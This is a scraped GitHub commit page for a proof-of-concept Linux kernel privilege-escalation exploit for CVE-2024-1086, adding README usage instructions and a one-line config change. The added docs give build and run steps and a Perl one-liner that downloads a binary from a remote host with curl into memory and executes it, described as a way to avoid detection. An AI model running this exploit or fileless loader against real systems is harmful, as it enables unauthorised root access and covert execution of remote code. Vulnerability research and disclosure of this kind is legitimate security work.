Skip to content

Commit f97ae80

Browse files
author
Your Name
committed
fix: fixed config (disable static userhelper) and added exploit usage docs
1 parent b648cfc commit f97ae80

2 files changed

Lines changed: 46 additions & 2 deletions

File tree

README.md

Lines changed: 45 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -1,6 +1,6 @@
11
# CVE-2024-1086
22

3-
Proof-of-concept exploit for CVE-2024-1086, working on most Linux kernels between (including) v5.14 and (including) v6.6, including (but not limited to) Debian, Ubuntu, and KernelCTF. The success rate is typically around 99,4% (n=1000) to 93% (n=1000).
3+
Fileless proof-of-concept exploit for CVE-2024-1086, working on most Linux kernels between (including) v5.14 and (including) v6.6, including (but not limited to) Debian, Ubuntu, and KernelCTF. The success rate is typically around 99,4% (n=1000) to 93% (n=1000).
44

55
---
66

@@ -11,6 +11,50 @@ The only requirements are that user namespaces are enabled (kconfig `CONFIG_USER
1111
- the exploit may be unstable on systems with a WiFi adapter, surrounded by high-usage WiFi networks. When testing, please turn off WiFi adapters through BIOS.
1212
- the exploit does not work v6.4> kernels with kconfig `CONFIG_INIT_ON_ALLOC_DEFAULT_ON=y` (including Ubuntu v6.5)
1313

14+
## using the exploit
15+
16+
### configuring the exploit
17+
18+
In [`src/config.h`](/src/config.h) are several configuration values which may need to be tweaked.
19+
20+
The default values should work out of the box (and have been tested for stability) on tested setups (see blogpost). On non-tested setups/distros, please make sure the kconfig values match with the target kernel.
21+
22+
Note that if you are running the exploit over SSH (into the test machine) or a reverse shell, you may want to toggle `CONFIG_REDIRECT_LOG` to `1` to avoid unnecessary network activity.
23+
24+
### building the exploit
25+
26+
Building the exploit is incredibly easy (outfile: `CVE-2024-1086/exploit`):
27+
28+
```bash
29+
git clone https://github.com/Notselwyn/CVE-2024-1086
30+
cd CVE-2024-1086
31+
make
32+
```
33+
34+
Please note that you may need to install certain tools like musl-gcc. Because of the different distros you may want to compile this exploit on, I will not provide instructions on how to install those.
35+
36+
### running the exploit
37+
38+
Running the exploit is just as trivial:
39+
40+
```bash
41+
./exploit
42+
```
43+
44+
Note that fileless execution is also supported, in case of pentest situations where detections need to be avoided.
45+
46+
Perl needs to be installed on the target:
47+
```bash
48+
perl -e '
49+
require qw/syscall.ph/;
50+
51+
my $fd = syscall(SYS_memfd_create(), $fn, 0);
52+
open(my $fh, ">&=".$fd);
53+
print $fh `curl https://example.com/exploit -s`;
54+
exec {"/proc/$$/fd/$fd"} "memfd";
55+
'
56+
```
57+
1458
## blogpost / write-up
1559

1660
A full write-up of the exploit can be found in the blogpost: ["Flipping Pages: An analysis of a new Linux vulnerability in nf_tables and hardened exploitation techniques"](https://pwning.tech/nftables/) @ pwning.tech

src/config.h

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -4,7 +4,7 @@
44

55
#define KMOD_PATH_LEN 256 // default
66

7-
#define CONFIG_STATIC_USERMODEHELPER 1 // default
7+
#define CONFIG_STATIC_USERMODEHELPER 0 // default
88
#define CONFIG_STATIC_USERMODEHELPER_PATH "/sbin/usermode-helper" // default. if 1: check for this instead of modprobe_path
99

1010
// if CONFIG_PHYSICAL_ALIGN is not defined in kconfig, use the CONFIG_PHYSICAL_START value

0 commit comments

Comments
 (0)